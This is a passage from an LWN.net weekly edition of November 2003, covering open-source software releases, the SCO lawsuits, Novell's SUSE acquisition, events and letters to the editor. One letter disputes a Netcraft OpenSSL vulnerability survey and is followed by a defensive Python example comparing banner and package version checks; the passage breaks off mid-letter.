KDE.News looks at the latest release of PyKDE, the Python bindings for KDE. "The latest release of PyKDE (3.8.0) includes the ability to write KDE panel applets completely in Python -- absolutely no C++ required. This is the first in what's planned to be a number of extensions for PyKDE that allow plugins and related objects to be created entirely in Python; David Boddie is nearing release of modules for authoring KParts for export (PyKDE already imports KParts), KDE Control Center modules, and IOSlaves."
gDesklets 0.24.1 released (GnomeDesktop)
If you find your screen to be too boring, GnomeDesktop.org reports on the availability of version 0.24.1 of the gDesklets desktop candy package.
XFce Goodies
New Goodies are available for the XFce desktop environment. Some of the Goodies include monitors for system load, battery state, net load, a clipboard, a calendar, and more.
Translucent X screenshots
The Freedesktop.org X Server Project has posted some screen shots showing off the new translucent windows feature. Have a look for some serious eye candy. (Seen on FootNotes).
Electronics
XCircuit 3.1.26 released
Version 3.1.26 of XCircuit, an electronic schematic editing package, is out. Change information is in the source code.
Financial Applications
GNUe Traffic
Two new copies of GNUe Traffic are available this week, see Issue #98, dated November 3, and Issue #99, dated November 10 for the latest news from the GNU Enterprise project.
Games
Boson 0.9 finally released!
Version 0.9 of Boson, a real-time strategy game for KDE, is out. See the announcement for change information.
GBA Programming with DevKit Advance (O'ReillyNet)
Howard Wen looks at DevKit Advance on O'Reilly. "People interested in making their own games for the Nintendo Gameboy Advance will find the unofficial Gameboy Advance (GBA) software development kit (SDK) indispensable. Based on the GNU Compiler Collection (GCC), DevKit Advance runs on Windows, Linux, and Mac OS X; it comes compiled with the Socrates Gameboy Advance Development Environment (SGADE), a library of generic code for the GBA platform released under an open source license. The rest of the DevKit Advance code is released under the GNU General Public License."
Graphics
Imview 1.0.1 and 1.1.2 released
Versions 1.0.1 and 1.1.2 (unstable) of Imview, an image viewing and analysis application, have been released.
Inkscape project formed (GnomeDesktop)
GnomeDesktop.org covers the Inkscape project, which aims to create an SVG-compliant vector graphics editor. "Bryce Harrington wrote: Nathan, mental, Ted and myself have decided to embark on our own direction with the Sodipodi codebase. We have attempted to do this as part of the Sodipodi project, but we believe we need to try out a new project structure to have the freedom to be able to explore some approaches radically different from Sodipodi. We have recently reworked the Sodipodi codebase to build with a C++ compiler and renamed it 'Inkscape'."
Interoperability
Samba 3.0.1pre2 available for download
Samba 3.0.1pre2 has been released. "This is another preview release of the Samba 3.0.1 code base and is provided for testing only. This release is *not* intended for production servers. Use at your own risk. There have been several bug fixes since 3.0.0 that we feel are important to make available to the Samba community for wider testing."
Wine Traffic
Wine Traffic issue #195 has been published. Topics include: Wine for Crystallography, WineConf 2004, DirectX Games Tested, Copy Protection Sucks, and IPX Improvements.
Music Applications
Mammut 0.16 released
Version 0.16 of Mammut, an audio FFT tool, is out with some code cleanup and support for JACK.
Marlin 0.2 released
Version 0.2 of Marlin, an audio sample editor for GNOME, is available. Also, see this report on GnomeDesktop.org for more information on Marlin.
MusE version 0.6.2 is out
Version 0.6.2 of MusE, a MIDI/audio-based virtual studio, is out. "Release 0.6.2 has a large number of improvements and bugfixes, current users are encouraged to upgrade."
Web Browsers
Mozilla.org staff meeting minutes
The minutes from the mozilla.org staff meeting for October 27 and November 3, 2003 are online.
Independent Status Reports (MozillaZine)
The Mozilla Independent Status Reports for November 9, 2003 are available.
Word Processors
AbiWord Weekly News
Issue #169 of the AbiWord Weekly News is out. Here's the summary: "Quite a bit of work on our two new features while also discussing massive sweeps of changes in the tree-layout, the stillness of SCO and um...what was it now? I know it was something you really would like, but I forgot. Oh, yeah, we were discussing AbiShow. This was a big week."
Miscellaneous
gFTP 2.0.16 has been released (GnomeDesktop)
Version 2.0.16 of the gFTP FTP client for GNOME has been announced. Lots of bug fixes are included.
JFreeReport 0.8.4-5 released (SourceForge)
Version 0.8.4-5 of JFreeReport, a Java class library for generating reports, is available. "This is the next minor bugfix release of JFreeReport. Despite some bugfixes, the ext-package now contains the first demo on how to show JFreeCharts within a report."
LTI-Lib Beta release 1.9.7 (SourceForge)
SourceForge has an announcement for version 1.9.7 beta of LTI-Lib, a cross-platform C++ computer vision library. "This release provides new functors and features, many bug fixes and more documentation."
Languages and Tools
Caml
Caml Weekly News
The November 4-11, 2003 edition of the Caml Weekly News is out with the latest Caml language news and discussions.
Java
JGraphT 0.5.1 released (SourceForge)
Version 0.5.1 of JGraphT, a cross-platform Java class library that provides graph-theory objects and algorithms, has been announced. "The new version delivers accumulated developments, bug fixes and improvements."
JSP
JSP 2.0: The New Deal, Part 1 (O'Reilly)
Hans Bergsten explores JSP 2.0 on O'Reilly. "The wait is almost over: the latest version of the JavaServer Pages (JSP) specification, JSP 2.0, is about to be released, along with all of the other J2EE 1.4 specifications. The jump to a new major revision for this JSP version signifies that all of the pieces are now in place for using JSP in a new way: there's no need for Java in the pages, thanks to the new Expression Language (EL) and the JSP Standard Tag Library (JSTL), and reusing code is much easier, thanks to two new ways to develop custom actions."
Pascal
Free Pascal 1.9.0 released
Version 1.9.0, the first public beta for version 2.0 of Free Pascal, is available. See the project news page for a list of changes.
Perl
Perl 5.8.2 released (use Perl)
Version 5.8.2 of Perl has been released. "5.8.2 is being released to fix minor binary incompatibilities discovered between 5.8.1 and 5.8.0. 5.8.2 is fully binary compatible with 5.8.0, and wherever possible also binary compatible with 5.8.1. The release also provides other minor bugfixes, including several for ithreads."
Perl 5.6.2 RC1 is out (use Perl)
Perl 5.6.2 RC1 has been announced. "Following shortly a new release on the 5.8 maintenance track, here is an updated version of Perl 5.6. Its purpose is to fix the build issues that appeared since Perl 5.6.1 was released, due to new compilers and systems. A few modules were updated as well."
This Week on perl5-porters (use Perl)
The November 3-9, 2003 edition of This Week on perl5-porters has been published. "This week was undoubtedly a maintenance-oriented week, as it has seen the release of perl 5.8.2, and of perl 5.6.2 RC1. But of course and as usual this wasn't the only topic on the always active p5p list."
This week on Perl 6 (O'Reilly)
The November 2, 2003 edition of This week on Perl 6 has been published. Take a look to learn about Perl 6 internals.
Bringing Java into Perl (O'Reilly)
Phil Crow talks about executing Java from Perl on O'Reilly. "In this article, I will show how to bring Java code into a Perl program with Inline::Java. I won't probe the internals of Inline or Inline::Java, but I will tell you what you need to make a Java class available in a program or module. The program/module distinction is important only in one small piece of syntax, which I will point out."
PHP
mnoGoSearch-php-3.2.3 and mnoGoSearch-php-extension-1.83
New versions of the PHP frontend and extension for the mnoGoSearch web site search engine are available.
Python
Understanding Network I/O: From Spectator to Participant (O'ReillyNet)
George Belotsky illustrates the writing of a Python-based network client on O'Reilly. "This article focuses on Internet clients. Clients like your web browser request information from servers (like the one from which you accessed this page). Typically, the client then presents the information to a person, although there are clients that talk to other computer programs instead. The next article will present ideas that are also applicable to developing servers and peer-to-peer systems."
Dr. Dobb's Python-URL!
The Dr. Dobb's Python-URL! for November 10, 2003 is online with another round of links to Python language articles.
Scheme
Scheme Weekly News
The November 10, 2003 edition of the Scheme Weekly News is out with the latest Scheme language development information.
Tcl/Tk
Dr. Dobb's Tcl-URL!
The November 10, 2003 Dr. Dobb's Tcl-URL! is out with links to the latest Tcl/Tk news and articles.
XML
XML style guidelines for leveraging schema validators
Erik Ostermueller discusses XML Schema validation on IBM's developerWorks. "Used correctly, XML Schema validation can dramatically reduce the effort necessary to perform basic data validation tasks. Additionally, validation rules that are centrally located in an XML schema can help users to better understand your system. It takes the right XML structure, however, to leverage a schema validator. This article discusses proper XML structure as well as best and worst practices for defining data validation rules in XML Schema."
The Long, Long Arm of SGML (O'Reilly)
Kendall Grant Clark examines the legacy effects of SGML on XML. "Some significant percentage of the pain suffered by the XML development community over the past 5 years is directly attributable to dealing with the legacy of SGML. It has, in other words, turned out to be much harder, much more complex to do "SGML on the Web" than many people thought it would be. A considerable amount of the early traction seized by XML was due to the confluence of two forces: first, the technical maturity of SGML; second, the early to middle years of exuberance about the Web itself."
Editors
DocBook Menu for Emacs v0.90 released (SourceForge)
Version 0.90 of DocBook Menu for Emacs has been announced on SourceForge. "This is the initial release of a package (for GNU Emacs 21.x or 20.x) that adds a hierarchical, customizable DocBook menu to your Emacs menubar. The menu is designed to provide quick and easy direct access, from within Emacs, to a variety of DocBook documentation and to the DocBook XSLT stylesheets."
IDEs
Anjuta 1.1.98 released (SourceForge)
Version 1.1.98 of Anjuta, an IDE for C/C++ under GNOME/GTK, is available. "Features include project management, application wizards, an onboard interactive debugger, and a powerful source editor with browsing and syntax highlighting."
Treebeard version 0.8.5 released (SourceForge)
Version 0.8.5 of Treebeard, a cross-platform XSLT IDE, has been released. "Its editor allows the loading and editing of an XML document and an XSLT document at the same time. It can apply the XSLT to the XML and display the output for further editing / saving in XML, HTML or PDF."
Miscellaneous
SCons 0.94 released
Version 0.94 of SCons, a software build tool that replaces Make, has been released.
Page editor: Forrest Cook
Linux in the news
Recommended Reading
The Grinch Who Stole Linux
On Groklaw: "The Grinch Who Stole Linux":
Now, please don't ask why. No one quite knows the reason.
It could be that their heads weren't screwed on quite right.
It could be, perhaps, that their shoes were too tight.
But I think that the most likely reason of all
May have been that their bank account was two sizes too small.
Holding Up Hollywood (Forbes)
Here's a Forbes article (via Yahoo, since Forbes.com requires registration now) stating that SCO is planning to target film studios which are using Linux. "So what if the studios tell SCO to take a hike? `We're going to force people down a path,' McBride says. `They can choose licensing or litigation. If someone says they want to see a court ruling before they pay, we'll say, Fine, you're the lucky winner. We'll take you first. I'd be surprised if we make it to the end of the year without filing a lawsuit.'"
Microsoft prepares security assault on Linux (InfoWorld)
InfoWorld reports that Microsoft has a new anti-Linux campaign in the works; this one will, somehow, try to claim that Microsoft is better at fixing security problems. "In a sign that the inroads made by the Open Source community are starting to rattle the software giant, Microsoft has hired several analysts to review how fast holes are patched in the open source software and is expected to announce that Windows compares favorably."
Trade Shows and Conferences
Yet Another Rendition of Linux (Wired)
Wired reports from the Desktop Linux Conference, where Bruce Perens has announced backing for a new, desktop-oriented version of the Debian distribution. "The companies supporting UserLinux will also contribute developers to the project. In return, they'll get an operating system with unlimited seats and options for paid technical support, ideally, from a variety of competing service providers. UserLinux should be available in six months, and discs containing a consumer version of UserLinux could hit retail store shelves shortly thereafter."
Desktop Linux Conference: KDE Report (KDE.News)
George Staikos reports on the KDE presence at the Desktop Linux Conference. "We still haven't educated people enough regarding FreeQt. People who should be well educated about these things were still trying to tell me that if Trolltech is acquired, KDE would end up being a proprietary platform."
The SCO Problem
SCO lawyers promised settlement payday (News.com)
News.com looks into the money being made by the law firm representing SCO. "In a recent filing with the Securities and Exchange Commission, SCO reported that it is finalizing an agreement that would pay the law firm involved in its intellectual-property suits 20 percent of any money gained via settlements. The company's lawyers would receive the same percentage of any funds received through equity financings or a sale of the company while it has litigation pending. The agreement, first detailed in The Wall Street Journal on Thursday, also stipulates that additional payments could be made to the law firm of $1 million and 400,000 shares of SCO's common stock."
IBM's Subpoenas to Analysts and Investors: Why? Why? Why? (Groklaw)
Groklaw follows the money in a look at SCO's financial dealings. The bulk of the article is a lengthy investigation into yet another SCO lawsuit: the one charging securities fraud relating to SCO's (Caldera's) IPO. This has looked like a routine dotcom IPO sleaze case, but there is, it seems, an added twist: the use of paid "analyst opinions" to inflate the value of the stock. "Of course, being accused of something isn't at all the same as being found guilty of it. But at a minimum, I think we can assume that IBM is aware of this case, and while I have no inside information, I'm guessing that this little piece of history might inspire them to be interested in talking to the current crop of analysts, in addition to whatever other reasons they might have."
SCO, IBM battle heats up (News.com)
News.com reports that SCO has sent out a new set of subpoenas. "Those include Novell; Linus Torvalds, creator of the Linux kernel; Richard Stallman of the Free Software Foundation; Stewart Cohen, chief executive of the Open Source Development Labs; and John Horsley, general counsel of Transmeta." It sure would be fun to be able to watch while SCO's lawyers try to depose RMS...
Linux Adoption
Microsoft Loses to Linux in Thailand Struggle (LinuxInsider)
LinuxInsider has posted an article on growing Linux sales in Thailand. "Significantly, first-time PC users in Thailand are finding the Linux Thai Language Edition easier to master than Windows."
Interviews
Linus Fields Dev Questions On the Future of Linux (OET)
OpenEnterpriseTrends.com interviews Linus Torvalds. "OET brings our readers an extended transcript of Linus' shipboard Q&A, where he responds to Linux dev questions on the future of Linux, including the status of Linux 2.6, impacts from increasing corporate (and vendor) adoption, an ever-growing kernel, and even on the pending lawsuit from SCO."
Meet OAP -- an open robot reference design project (LinuxDevices)
LinuxDevices.com talks with Dafydd Walters, project leader of the Open Automaton Project. "OAP's SourceForge-hosted Website provides circuit schematics, source code, and documentation for free download under an Open Source license, "to enable robotics enthusiasts to assemble their own intelligent mobile robot," says Walters."
Interview with George Staikos (usalug.org)
The USA Linux Users Group features an interview with George Staikos, KDE core developer and promoter. What can you expect in KDE 3.2? George says, "Speed -- We did some great optimizations in various areas of KDE. Some of note include major KJS performance enhancements (from Apple and us as well), faster loading Konqueror via the preloader, application launch time reductions, and general optimizations to the core libraries."
Resources
Customizing a Lindows MobilePC (Linux Journal)
Steve Hastings shows how to convert a Lindows MobilePC into a vanilla Debian system on LinuxJournal. "My favorite version of Linux is Debian GNU/Linux, and I wanted my eNote to run the Unstable branch of Debian. This did not require a complete reinstall because Lindows is based on Debian, and Lindows includes all the essential Debian utilities, such as apt-get. Lindows does not use these utilities but its own Click-N-Run system. Lindows.com could have easily removed those utilities, but it left them in place; that was nice."
Reviews
Moodss for monitoring (NewsForge)
NewsForge reviews Moodss, a system monitoring application. "I downloaded the Moodss tarball from the website, decompressed it, and started it up. It's that easy. The main window is deceptively simple. Great power lurks just below the surface of that mild exterior."
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
New Apache licenses under consideration
The Apache Software Foundation is developing a new set of licenses intended to cover software produced by Apache projects. There are three new licenses: the Apache License 2.0 would apply to most software, but the Apache RI License and the Apache TCK license deal with the extra constraints that come with Java-based projects. There are some concerns in some quarters that the licenses are not 100% free, due to some of the patent language and the Java restrictions. To your editor, however, they appear to be free licenses, given the fact that some Java software simply cannot be free. Interested people are encouraged to read the licenses and make comments - after having perused the mailing list archives.
Open Source Software Institute Releases Components to eGovernment Web Services Platform
The Open Source Software Institute (OSSI) has announced the release and availability of Project Leopard (Phase 1), the core component of its eGovernment web services platform based on LAMP (Linux, Apache, MySQL, PHP/Perl/Python).
GNOME News
Footnotes reports that the GNOME Foundation Membership & Elections Committee has announced the final list of candidates running for the 2003 elections.
Footnotes also reports that Chema Celorio died while skydiving in Mexico. "For those of you not in Ximian who don't know, Chema started and ran our Mexico City office, led the Ximian Setup Tools team a few years ago, was in charge of the team that managed our contract with HP, led the Ximian Desktop for a while, was one of the creators of GNOME Love, and was recently our lead sales engineer for Europe."
DotGNU 0.1 Released on CD
Version 0.1 of DotGNU, the open-source alternative to .NET, is available on CD. "DotGNU, the GNU project's Free Software alternative to .NET, has come a long way in the last 2.5 years, and it is now possible to use DotGNU to implement application programs and web services in C#, running them in the DGEE webservice server, and integrating them with the phpGroupWare web-based GroupWare suite."
Commercial announcements
Aspen Systems Announces A Distribution Partnership With MandrakeSoft
Aspen Systems, Inc. has announced a distribution partnership with MandrakeSoft. Aspen Systems will enlarge its technology portfolio and will have the right to market, support and sell the MandrakeClustering Linux operating system in the United States.
Sharp's "home server" to run MontaVista Linux
MontaVista has sent out a press release announcing that its "Professional Edition" will be running inside Sharp's HG-01S ("Galileo") home server. This server looks like a fun gadget; it handles video recording (onto an internal 120GB disk), functions as a web server, and can be controlled in several ways. One just hopes that a lot of attention is being paid to security issues.
Novell acquires SUSE
It appears the rumors were correct: Novell has announced its intent to acquire SUSE Linux. As a result, "Novell will be the only $1 billion software company with a Linux distribution and the worldwide technical staff to support it". Novell is putting up $210 million in cash as part of the deal. Some of that is coming right back: IBM is going to invest $50 million in Novell, and the two companies will be working other deals to continue SUSE's support of Linux on IBM's systems. The deal should close by the end of January.
SGI Altix 3000 Proves Favorite With Linux Journal Readers
SGI has announced that its SGI Altix 3000 family of servers and superclusters has been named "Favorite Server" in Linux Journal's annual Readers' Choice Awards.
The return of Trustix Secure Linux
For Trustix Secure Linux users: the announcement has gone out that the acquisition of Trustix by the Comodo Group is complete, and Trustix Secure Linux will be returning to the market. The work that was done, for a short time, under the name "Tawie Server Linux" will be merged back into Trustix. "Confused? In plain text things are slowly going back to how they where before Trustix AS went bankrupt. It also means that we now have more resources than before, which will enable the TSL team to focus more on TSL development than we have been able to before".
Freedom Technology Center Events
A new Linux training facility is open. "The Freedom Technology Center, a new IT training facility in Mountain View, California, will open on Saturday, November 22nd with a free one-day class on email security, entitled "Protecting email users from viruses, spam, and other threats.""
Ransom Love joins Progeny board
Ransom Love has joined the board of Progeny. Mr Love is, of course, a co-founder of Caldera and served as its CEO for years - though he got out before Caldera turned into the SCO Group and went on the attack.
Novell Lowers Linux Management Costs with Red Carpet Enterprise 2
Novell has announced the availability of Ximian Red Carpet Enterprise 2, the latest version of Ximian's management software for workstations and servers. Ximian Red Carpet Enterprise is part of Novell Resource Management and it extends the Linux capabilities of Novell ZENworks.
UK Support available for Red Hat Enterprise
LinuxIT is now providing support for Red Hat Enterprise Linux V3 in the UK.
Linux Bangalore/2003 Receives Sponsorship
The Linux Bangalore/2003 conference has secured the Platinum, Gold, and Silver levels of sponsorship from HP, Novell, and Exocore Consulting.
MySQL gets more customers, sales projected to double
MySQL AB has sent out a press release proclaiming a new set of customers and the fact that it has doubled sales again over the last year.
New Books
Two Python manuals published
The first two volumes of the official Python documentation, The Python Tutorial and Python Language Reference Manual, are now available as printed books.
Resources
EDRI-gram newsletter
The November 5 EDRI-gram newsletter is out. This issue looks at the debate over the proposed European intellectual property rights enforcement directive (which appears to be facing a difficult road), "Big Brother" awards presented in several European countries, efforts to avoid the deployment of unsafe electronic voting systems, and several other topics.
IBM releases Q4 Linux middle software CD Set
IBM has released its Q4 Linux middle software CD set. The set is available for free (registration required).
LDP Weekly News
The November 12, 2003 edition of the Linux Documentation Project Weekly News is out with the latest documentation changes and additions. Take a look at the HOWTO generator and a discussion about HOWTOs lacking depth, among other things.
OpenOffice.org Newsletter
Volume 1, Issue #5 of the OpenOffice.Org Newsletter has been published. Take a look for the latest OpenOffice.org reviews, MS Office 2003 critiques, and more.
Open Source Maturity Model released
Gemini Ernst & Young have released a model for measuring the maturity of open-source software. "This model allows you to determine if or which open source product is suitable using just seven clear steps. Not only a good way to keep interesting but immature products away from your business, but also a useful tool to objectify the discussion on applying Open Source in the workplace." Feedback is requested.
Upcoming Events
The Grid Wars Parallel Programming Challenge
Submissions are open until November 15, 2003 for the Grid Wars parallel programming challenge.
Open Source at Comdex Winners and Results (O'Reilly)
O'Reilly has announced the results of a contest for populating the COMDEX Open Source Pavilion. Winning projects include: Plone, KDE, OpenOffice.org, Zope, the Gimp, and GNOME.
KDE at the Comdex Open Source Pavilion
KDE.News reports on the KDE presence at the upcoming COMDEX conference. "KDE will be represented at the large US computer show COMDEX, in Las Vegas, from the 17th to 20th November, as a result of placing second in a poll run by O'Reilly Network. Developer George Staikos will be demonstrating the soon-to-be-released KDE 3.2, featuring a vast number of improvements in all areas, as well Kolab, the Free Software groupware solution."
Desktop Linux Consortium offers discounts to LUGs
The Desktop Linux Consortium has announced the availability of a discounted entry fee for LUG members. "Responding to many requests, The Desktop Linux Consortium has announced that Integrated Computer Solutions (ICS) of Cambridge, MA has offered to support members of Linux User Groups (LUGs) in attending the Desktop Linux Consortium Conference at Boston University's Corporate Education Center by offering a limited number of spots for LUG members for US $25."
GUADEC 2004 Slated for Norway
Here's a press release for the fifth annual GNOME User and Developer European Conference (GUADEC). GUADEC 5 (or GVADEC) will be held in Kristiansand, Norway, June 28-30, 2004.
WineConf 2004 announced
WineConf 2004 will be held from January 31 to February 1, 2004 in St. Paul, Minnesota.
LUGOD November Installfest
The Linux Users' Group of Davis, California will be holding another Linux Installfest workshop on Sunday, November 16, 2003.
Events: November 13 - January 8, 2003
| Date | Event | Location |
|---|---|---|
| November 14 - 16, 2003 | Third International Ruby Conference | (Red Lion Hotel) Austin, Texas |
| November 15 - 21, 2003 | Supercomputing Conference (SC2003) | (Phoenix Civic Plaza Convention Center) Phoenix, AZ |
| November 16 - 19, 2003 | ApacheCon 2003 | Las Vegas, Nevada |
| November 16 - 20, 2003 | COMDEX 2003 | (Las Vegas Convention Center) Las Vegas, Nevada |
| November 20 - 21, 2003 | ObjectWeb Conference | (INRIA Rocquencourt) Rocquencourt, France |
| November 22, 2003 | Southern California Linux Expo (SCALE) | (Los Angeles Convention Center) Los Angeles, CA |
| November 22 - 24, 2003 | New York GNOME Summit | (Brooklyn College) New York, NY |
| November 24 - 26, 2003 | Open Standards and Libre Software in Government Conference (CANCELLED) (EGOVOS 3) | Paris, France |
| November 26 - 27, 2003 | Forum PHP Paris 2003 | (Club Confair) Paris, France |
| December 2 - 4, 2003 | Linux Bangalore/2003 | Bangalore, India |
| December 9 - 13, 2003 | International Conference on Logic Programming (ICLP'03) | Mumbai (Bombay), India |
Software announcements
This week's software announcements
Here are the software announcements, courtesy of Freshmeat.net. They are available in two formats:
- Sorted alphabetically,
- Sorted by license.
Miscellaneous
MSfreePC.com Donating Money to Mozilla (MozillaZine)
MozillaZine reports on a new way of funding open-source software development. "Those California residents who qualify for the $1.1 billion MS antitrust settlement can choose to have money donated to open source projects, including Mozilla, at a website set up by Lindows." "Microsoft antagoniser Lindows.com set up MSfreePC.com as an alternative to the standard claims procedure agreed by Microsoft and Townsend and Townsend and Crew, lawyers for the plaintiffs. Whenever a qualifying consumer uses the site to claim his or her share of the legal settlement, MSfreePC.com will contribute 10% of the value of the claim to Mozilla or one of four other open-source projects, including Debian, KDE, GNOME and OpenOffice.org."
Page editor: Forrest Cook
Letters to the editor
Many vulnerable OpenSSL libraries in the wild?
| From: | Jerome Lacoste <lacostej-AT-frisurf.no> | |
| To: | magnus-AT-netcraft.com | |
| Subject: | Many vulnerable OpenSSL libraries in the wild? | |
| Date: | Thu, 06 Nov 2003 14:18:49 +0100 | |
| Cc: | letters-AT-lwn.net |
Magnus,
I wished to react to the Netcraft article posted under your name
regarding the high number of obsolete and thus vulnerable versions of
OpenSSL found on the Internet.
I tend to question the way the gathering of the data was done. It seems,
according to your article that you just used the Web server's signature.
Unfortunately this is not sufficient, and this for at least one reason:
the backporting of security fixes.
Many Linux distributions backport fixes, meaning that the version number
will not be increased while the vulnerability will be removed.
Taking two examples of two machines I have at hand, one running Debian
Woody one running Mandrake 9.1. These two machines are accessible on the
Internet.
jerome-AT-debian Woody> dpkg -l openssl
ii openssl 0.9.6c-2.woody.4 [...]
jerome-AT-mandrake 9.2> rpm -q openssl
openssl-0.9.7a-1.2.91mdk
Does that mean that mandrake 9.1 and Debian Woody are vulnerable? No (at
least to currently known vulnerabilities). But these 2 machines would
(and perhaps have been) counted in the results of the NetCraft survey.
The only way to find out whether a vulnerability is present or not is to
try to exploit it. That's what the people from NISC seem to be doing.
What I am afraid of is that this survey seems to create a false sense of
risk for solutions running on OpenSSL. Many of these solutions are open
source, and this article could be used as FUD against these systems.
So until a better way to identify whether these systems are indeed
vulnerable, I would be happy if Netcraft could publish an addendum to
that article, in order to decrease this perhaps false sense of risk that
this article generated.
See also the article on LWN for more discussions[2].
Cheers,
Jerome
[1] http://news.netcraft.com/[...]
[2] http://lwn.net/Articles/56713/
--
Jerome Lacoste - CoffeeBreaks - IT Consulting
jerome-AT-coffeebreaks.org - http://www.CoffeeBreaks.org
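The backporting problem raised in the letter above, as an added example that is not part of the letter or of the Netcraft survey: it contrasts a verdict drawn from the `Server` banner with one drawn from the installed package build. The host names, banners, the older `woody.1` build, the upstream thresholds and the simplified revision ordering are all constructed assumptions; only the two package versions come from the letter.

```python
import re

# Illustrative upstream thresholds (assumption): first letter release per
# branch treated as fixed. Substitute the values from the advisory in question.
UPSTREAM_FIXED = {"0.9.6": "k", "0.9.7": "c"}

# Assumption taken from the letter: these distribution builds carry the
# backported fix even though the upstream version string is unchanged.
DISTRO_FIXED = {"debian-woody": "0.9.6c-2.woody.4",
                "mandrake-9.1": "0.9.7a-1.2.91mdk"}

# Constructed inventory: (host, distro, Server banner, installed package).
HOSTS = [
    ("web1", "debian-woody",
     "Apache/1.3.26 (Unix) Debian GNU/Linux mod_ssl/2.8.9 OpenSSL/0.9.6c",
     "0.9.6c-2.woody.4"),
    ("web2", "mandrake-9.1",
     "Apache/2.0.44 (Unix) mod_ssl/2.0.44 OpenSSL/0.9.7a",
     "0.9.7a-1.2.91mdk"),
    ("web3", "debian-woody",
     "Apache/1.3.26 (Unix) Debian GNU/Linux mod_ssl/2.8.9 OpenSSL/0.9.6c",
     "0.9.6c-2.woody.1"),   # constructed: build older than the fixed one
]

def banner_verdict(banner, fixed=UPSTREAM_FIXED):
    """What a signature-only survey concludes: 'flagged', 'ok' or 'unknown'."""
    m = re.search(r"OpenSSL/(\d+\.\d+\.\d+)([a-z]?)", banner)
    if not m or m.group(1) not in fixed:
        return "unknown"
    return "flagged" if m.group(2) < fixed[m.group(1)] else "ok"

def revision_key(revision):
    """Numeric fields of a distro revision, e.g. '2.woody.4' -> (2, 4).
    Simplified ordering for this example, not dpkg's or rpm's algorithm."""
    return tuple(int(n) for n in re.findall(r"\d+", revision))

def package_verdict(installed, fixed_build):
    """Compare distro revisions of the same upstream version."""
    up_i, rev_i = installed.split("-", 1)
    up_f, rev_f = fixed_build.split("-", 1)
    if up_i != up_f:
        return "unknown"  # different upstream base: needs the packager's data
    return "patched" if revision_key(rev_i) >= revision_key(rev_f) else "unpatched"

def audit(hosts=HOSTS):
    """Return (host, banner verdict, package verdict) for each host."""
    return [(h, banner_verdict(b), package_verdict(p, DISTRO_FIXED[d]))
            for h, d, b, p in hosts]

def false_positives(hosts=HOSTS):
    """Hosts a banner survey flags although the package carries the fix."""
    return [h for h, bv, pv in audit(hosts) if bv == "flagged" and pv == "patched"]

if __name__ == "__main__":
    for row in audit():
        print(row)
    print("banner false positives:", false_positives())
```

All three hosts present the same kind of banner, so only the package-level check separates the two patched machines from the one that still needs an update.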
Linux Gazette
| From: | "Jay R. Ashworth" <jra-AT-baylink.com> | |
| To: | publisher-AT-linuxgazette.com | |
| Subject: | Re: Linux Gazette | |
| Date: | Thu, 6 Nov 2003 12:13:06 -0500 | |
| Cc: | letters-AT-lwn.net, tag-AT-linuxgazette.net, linux-questions-only-AT-ssc.com |
On Thu, Nov 06, 2003 at 11:22:16AM -0600, Phil Hughes wrote:
> I have been told by Heather Stern, acting as a spokesperson for TAG
> members, that all TAG members have elected to leave their volunteer
> position with Linux Gazette and move on to working on a new
> e-publication. As you are all volunteers, that is certainly your choice
> and I both respect your decision and want to thank you for your past
> contributions.
>
> I don't want to load you down with details if you are not interested in
> participating but I do want to reassure you that Linux Gazette is not
> going off in some strange new direction.
Alas, Phil, the consensus is that you *are, in fact* going off in some
strange new direction, and I concur with those who think so. And,
indeed, the Gazette *is* the people. I've seen, specifically, Sassy,
Computer Telephony, and Boardwatch curl up and die when the original
editors were replaced by corporate managements.
> In any case, based on Heather's statements, my default assumption will
> be that you have decided to move elsewhere. If that is not the case,
> please e-mail me at publisher-AT-linuxgazette.com and let me know your
> intentions. In any case, thanks again for your past work with Linux
> Gazette.
I continue to work with Linux Gazette, Phil; it's just not yours
anymore. Rumbles I hear about trademark infringement and threats like
suggest that you haven't quite figured that out yet. I think that's a
shame, really... but the community interprets silly corporate
manoeuvring as damage, and routes around it.
I hope this doesn't reflect negatively on the Journal; I've been happy
lately to see that your art direction and editing have been improving.
Cheers,
-- jra
--
Jay R. Ashworth jra-AT-baylink.com
Member of the Technical Staff Baylink RFC 2100
The Suncoast Freenet The Things I Think
Tampa Bay, Florida http://baylink.pitas.com +1 727 647 1274
OS X: Because making Unix user-friendly was easier than debugging Windows
-- Simon Slavin, on a.f.c
Linux Gazette
| From: | Rick Moen <rick-AT-linuxmafia.com> | |
| To: | tag-AT-linuxgazette.net, linux-questions-only-AT-ssc.com | |
| Subject: | Re: [TAG] Re: Linux Gazette | |
| Date: | Thu, 6 Nov 2003 10:43:36 -0800 | |
| Cc: | letters-AT-lwn.net |
[Reply-To set to TAG. Not Cc'ing Phil, since he's already seen this.]
Quoting Jay R. Ashworth (jra-AT-baylink.com):
> Alas, Phil, the consensus is that you *are, in fact* going off in some
> strange new direction, and I concur with those who think so.
It's important to realise that, at the time the staff (unanimously)
decided to leave, Phil and his webmaster had pretty much announced it as
a fait accompli that all the core concepts of a magazine (periodic
issues, editors) were to be done away with when the CMS rolled in.
He suddenly about-faced and _rediscovered_ interest in those concepts
only after we published the November (linuxgazette.net) issue.
Just because the TAG people and public haven't seen it before, what
follows is the staff's polite and appreciative notice to Phil on Oct. 28
that we were moving the magazine -- as previously discussed with him
numerous times as likely if he followed his plan. The text was kept
confidential at the time, because of the last item mentioned, but here
it is now nine days later, and SSC is still wrongfully asserting
copyright over Yan-Fa Li and LeaAnne Kolp's work. (See:
http://www.linuxgazette.com/node/view/58
http://www.linuxgazette.com/node/view/61 )
From rick Tue Oct 28 12:01:56 2003
Date: Tue, 28 Oct 2003 12:01:56 -0800
To: Phil Hughes <fyl-AT-a42.com>
Cc: Jeff Tinsler <jet-AT-comwestcr.com>
Subject: Transition matters
User-Agent: Mutt/1.5.4i
Dear Mr. Hughes:
I'm writing on behalf of the Linux Gazette staff and its current
leadership, Mike Orr and Heather Stern, to fill you in on what is going
on with Linux Gazette's magazine production and hosting, and to arrange
for an orderly transition.
SSC, Inc. has always been incredibly supportive of LG's activities,
helping out with mirror space four months after John M. Fisk founded our
publication at his ISP in Nashville, and then furnishing our _primary_
hosting for seven years -- from August 1996 until a few days ago.
Moreover, you've actually underwritten some of your staff's time in
helping us (Marjorie Richardson, Amy Kukuk, Mike Orr, Jeff Tinzler, and
others) throughout that time. We are very grateful.
Recently, Linux Gazette's staff decided that we needed to move our
hosting to a different site, because, although we are sympathetic to
your aim of operating a dynamic, CMS-driven site open to public posting,
that is not compatible with Linux Gazette's longstanding mission to
publish a periodic set of edited newsletters with editor-picked, fixed
